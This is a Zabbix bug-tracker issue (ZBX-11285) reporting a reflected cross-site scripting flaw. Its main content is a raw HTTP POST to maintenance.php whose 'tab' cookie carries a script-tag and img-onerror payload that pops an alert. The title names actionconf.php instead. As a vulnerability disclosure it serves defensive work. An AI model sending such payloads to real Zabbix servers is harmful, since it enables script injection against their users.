Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-11285

actionconf.php have Reflective XSS

XMLWordPrintable

    • Team A
    • Sprint 3, Sprint 4, Sprint 5, Sprint 6, Sprint 7, Sprint 8
    • 0.2

      POST /*****/maintenance.php HTTP/1.1
      Host: *****:18443
      Connection: keep-alive
      Cache-Control: max-age=0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
      Origin: https://*****:18443
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
      Content-Type: application/x-www-form-urlencoded
      Referer: https://*****:18443/*****/maintenance.php?form=Create+maintenance+period
      Accept-Language: zh-CN,zh;q=0.8
      Cookie: PHPSESSID=2l9kk6isfjdp1d795magb11aaf4ekrhr; zbx_sessionid=f9d1db7e92d49fd7f459a371d3dfa4f7;cb_maintenance_parts=0;tab=,//})// ]]><script>alert('xss')</script><img src=1 onerror=alert('xss')><!--
      Content-Length: 398

      sid=24230519c556deb5&form_refresh=1&form=Create+maintenance+period&active_since=1467216000&active_till=1467302400&mname=&maintenance_type=0&active_since_day=30&active_since_month=06&active_since_year=2016&active_since_hour=00&active_since_minute=00&active_till_day=01&active_till_month=07&active_till_year=2016&active_till_hour=00&active_till_minute=00&description=&new_timeperiod=New&twb_groupid=5

            Unassigned Unassigned
            chenyy cyy
            Team A
            Votes:
            0 Vote for this issue
            Watchers:
            5 Start watching this issue

              Created:
              Updated:
              Resolved: